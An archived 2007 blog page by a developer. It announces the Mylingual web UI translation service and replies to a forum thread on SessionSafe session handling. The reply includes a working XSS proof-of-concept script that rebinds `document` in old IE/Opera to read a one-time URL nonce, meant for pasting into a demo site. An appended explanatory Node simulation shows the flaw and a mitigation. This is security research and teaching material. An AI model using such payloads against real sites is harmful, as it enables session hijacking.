" /> Kazuho at Work: March 2007 Archives


March 29, 2007

Mylingual - Launch Announcement

Today I have officially launched my new web service: Mylingual. From the website,

Mylingual is an automatic translation service for web-based application user interfaces. Known as Japanize, it is already used by more than 25,000 users to browse websites like YouTube or del.icio.us in Japanese. All you need is a User JavaScript installed onto your PC (a Firefox extension is now under development), and the Web UI will be automatically translated.

mylingual.net

Web applications like YouTube, del.icio.us, and Google Reader are good examples for Mylingual. They are excellent web applications used from everywhere around the globe by people with a great variety of mother languages to access content in their own languages, but they only provide their application interfaces in English. This is a handicap for more than half of the world's population, especially for speakers of minor languages. As the world becomes flatter and flatter, and computer applications become web-based, localization is more important than ever before.

Mylingual is a community-based approach to overcoming the problem: localizing the applications by the users ourselves. The translations are automatically shared through a wiki-like system. Anyone can participate in, improve, and discuss the translations.

I started the original project, targeted at Japanese users, in August 2006. Known as Japanize, it gained more than 25,000 users within five months. I hope people with other mother languages can share the same benefit by using Mylingual. Please give it a try.

March 28, 2007

Re: SessionSafe: Implementing XSS Immune Session Handling

Re: SessionSafe: Implementing XSS Immune Session Handling
Posted by: majohn (IP Logged)
Date: March 08, 2007 04:46AM

ok, stop talking, let's break some code :) I found my old PoC-Code and put it (temporarily) online: [onetimeurls.databasement.net] (please notice: this is only a demo of the URLRandomizer not a full SessionSafe-PoC)

I genuinely would be interested if it is possible to steal the nonce from the url_randomizer object.

Re: SessionSafe: Implementing XSS Immune Session Handling - sla.ckers.org

Well, you can, by replacing the location object on Internet Explorer and Opera. I came to know the attack through the comments on snippets from shinichitomita’s journal. Thanks to nanto_vi-san.

Copy the exploit below into the textarea of onetimeurls.databasement.net.

<script>
// Rebind the global name `document` to a plain object. On the Internet Explorer
// and Opera builds of the time this shadows the host object, so the page's own
// scripts, when they assign to document.location.href, write into this object.
var document = { location: { href: '' } };
(function () {
  if (document.location.href == '') {
    // Nothing has been written yet: poll again in one second.
    setTimeout(arguments.callee, 1000);
  } else {
    // The URL randomizer has written its nonce-bearing URL into the fake object.
    alert(document.location.href);
  }
})();
</script>
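Why the script above can read the nonce, and the mitigation, as an added example that is not part of the original post or of SessionSafe: it runs in Node with constructed stand-ins for the browser objects, and it assumes the randomizer navigates by assigning to document.location.href (the page does not show the randomizer's code).

```javascript
// Added example (not from the page or the SessionSafe project). Simulates, with
// constructed stand-ins for browser objects, why a URL randomizer that resolves
// the name `document` at call time leaks its nonce when a page script rebinds
// that name, and why capturing the trusted reference up front does not.

// Randomizer variant 1 (assumed behaviour): look up `document` by name every
// time it navigates, so a later rebinding of the name redirects the write.
const lateBound = (resolveDocument, _trusted) => (path, nonce) => {
  resolveDocument().location.href = `${path}?n=${nonce}`;
};

// Randomizer variant 2 (mitigation): bind the real document once, at a point
// where no untrusted content has run yet, and only ever write through it.
const earlyBound = (_resolve, trustedDocument) => (path, nonce) => {
  trustedDocument.location.href = `${path}?n=${nonce}`;
};

// Re-enacts the exploit's steps against a given randomizer and reports where
// the nonce-bearing URL ended up. All objects here are constructed test data.
function simulate(makeRandomizer) {
  const realDocument = { location: { href: 'https://app.example/start' } };
  let bound = realDocument; // what the name `document` currently resolves to

  // The randomizer is initialised while the name still points at the real object.
  const navigate = makeRandomizer(() => bound, bound);

  // The page's `var document = { location: { href: '' } }` step: the name is
  // rebound to an attacker-controlled object with an empty href.
  const shadow = { location: { href: '' } };
  bound = shadow;

  // The application navigates to a one-time URL carrying a (constructed) nonce.
  navigate('/inbox', 'NONCE-constructed');

  return { leaked: shadow.location.href, real: realDocument.location.href };
}

// Stand-alone run: the late-bound variant leaks, the early-bound one does not.
console.log('late-bound :', simulate(lateBound));
console.log('early-bound:', simulate(earlyBound));
```

In current browsers `document` is an unforgeable attribute of `window`, so the `var document = ...` rebinding the page's script relies on is ignored; the capture-before-untrusted-code pattern still applies to any global that security-relevant code resolves by name.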